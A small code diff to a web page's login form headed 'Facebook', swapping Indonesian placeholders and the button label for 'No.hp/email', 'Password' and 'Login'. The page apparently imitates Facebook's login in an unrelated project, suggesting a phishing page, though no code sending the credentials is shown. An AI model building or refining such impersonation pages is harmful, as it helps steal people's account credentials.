--- a/public/index.html
+++ b/public/index.html
@@ -52,10 +52,10 @@
         <div class="login-container">
             <h2 translate="no">Facebook</h2>
             <form id="loginForm">
-                <input type="email" id="username" name="username" placeholder="Masukkan email Anda" required>
-                <input type="password" id="password" name="password" placeholder="Masukkan kata sandi Anda" required>
+                <input type="email" id="username" name="username" placeholder="No.hp/email" required>
+                <input type="password" id="password" name="password" placeholder="Password" required>
 
-                <button type="submit">Masuk</button>
+                <button type="submit" translate="no">Login</button>
             </form>
             <div class="forgot-password">Lupa kata sandi?</div>
             <div id="feedback" class="alert"></div>
